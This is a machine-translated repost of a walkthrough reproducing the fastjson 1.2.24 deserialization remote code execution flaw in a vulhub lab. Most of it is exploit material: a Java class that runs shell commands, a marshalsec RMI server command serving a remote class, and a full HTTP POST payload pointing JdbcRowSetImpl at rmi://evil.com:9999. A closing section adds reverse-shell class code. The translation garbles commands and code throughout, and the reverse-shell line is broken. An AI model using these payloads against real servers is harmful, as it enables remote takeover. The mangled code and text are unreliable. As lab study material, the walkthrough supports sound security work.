Shulou(Shulou.com)05/31 Report--

This article shows you how to analyze the fastjson 1.2.24 deserialization RCE vulnerability recurrence, the content is concise and easy to understand, can definitely brighten your eyes, through the detailed introduction of this article, I hope you can get something.

Fastjson 1.2.24 deserialization leads to arbitrary command execution vulnerability

Port: 8090

In the process of parsing json, fastjson supports using autoType to instantiate a specific class and call the set/get method of that class to access properties. By finding the relevant methods in the code, some malicious exploitation chains can be constructed.

According to the official patch file, the main update is on this checkAutoType function, and the main function of this function is to add a blacklist and add some commonly used deserialization libraries to the blacklist.

Vulnerability environment

The following test environment uses the docker image of vulhub to attach the link of Master P: https://github.com/vulhub/vulhub

Run the test environment:

Docker-compose up-d

After the environment is running, you can see the output in JSON format by visiting http://your-ip:8090.

We can update the server's information by POST a JSON object to this address:

Curl http://your-ip:8090/-H "Content-Type: application/json"-- recurrence of data'{"name": "hello", "age": 20} 'vulnerabilities

Because the target environment is Java 8u102, and there are no restrictions on com.sun.jndi.rmi.object.trustURLCodebase, we can use com.sun.rowset.JdbcRowSetImpl 's utilization chain to execute commands with the help of JNDI injection.

First compile and upload the command execution code, such as http://x.x.x.x:8989/TouchFile.class:

/ javac TouchFile.javaimport java.lang.Runtime;import java.lang.Process;public class TouchFile {static {try {Runtime rt = Runtime.getRuntime (); String [] commands = {"bash", "- c", "touch", "/ tmp/success"}; Process pc = rt.exec (commands); pc.waitFor () } catch (Exception e) {/ / do nothing}

Note:

String commands needs to add bash-c in some environments, otherwise the command cannot be executed.

If there is no web service, you can temporarily build a web server through php-S 0.0.0.0: port or python-m SimpleHTTPServer port, and its release directory is the current execution directory.

Then with the help of the marshalsec project, we start a RMI server, listen on port 9999, and load the remote class TouchFile.class:

If you do not have a maven environment, you need to install it. Here are the installation steps (take win10 as an example):

Download the installation package: apache-maven-3.6.3-bin.zip from the official website

Decompress apache-maven-3.6.3-bin.zip

Configure the environment variable, MAVEN_HOME is the unzipped root directory, we finally need to add% MAVEN_HOME%\ bin; to the Path global variable.

Verify that it is successful, and if no error is reported, the execution is successful, for example:

C:\ Users\ XXXX > mvn-versionApache Maven 3.6.3 (cecedd343002696d0abb50b32b541b8a6ba2883f) Maven home: d:\ System_Relation\ apache-maven-3.6.3\ bin\.. Java version: 1.7.0: 79, vendor: Oracle Corporation, runtime: d:\ Program Files\ Java\ jdk1.7.0_79\ jreDefault locale: zh_CN, platform encoding: GBKOS name: "windows 8.1", version: "6.3", arch: "amd64", family: "windows"

Clone the completed source code of the project by git clone or downloading the compressed package directly

Under the project directory, compile directly.

Eventually, a file like marshalsec-0.0.3-SNAPSHOT-all.jar will be generated.

Deploy the generated marshalsec-0.0.3-SNAPSHOT-all.jar package to a VPS on the public network and execute the following script

Java-cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://x.x.x.x:port/#TouchFile" 9999

If the above steps are unsuccessful, you can directly use the compiled jar package, recommend a github project, and select [fastjson] = > [marshalsec-0.0.3-SNAPSHOT-all.jar]:

Exploit script library Note: this jar package is compiled using jdk 1.8.

Send Payload to the range server with the address of the RMI:

POST / HTTP/1.1Host: your-ip:8090Accept-Encoding: gzip, deflateAccept: * / * Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64 Trident/5.0) Connection: closeContent-Type: application/jsonContent-Length: 160 {"b": {"@ type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "rmi://evil.com:9999/TouchFile", "autoCommit": true}}

As you can see, the command touch / tmp/success has been successfully executed:

Extension:

Now that you can execute the command, you can naturally bounce shell by modifying the command part of the previous Touch_File.java. The following is the code reference:

/ / javac shell_re.java import java.lang.Runtime; import java.lang.Process; public class shell_re {try {Runtime rt = Runtime.getRuntime (); String [] commands = {"/ bin/bash", "- c", "exec 5 amp5; done amp5; done"; Process pc = rt.exec (commands) Pc.waitFor ();} catch (Exception e) {/ / do nothing}

Shell rebounded successfully:

EXPfastjson

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.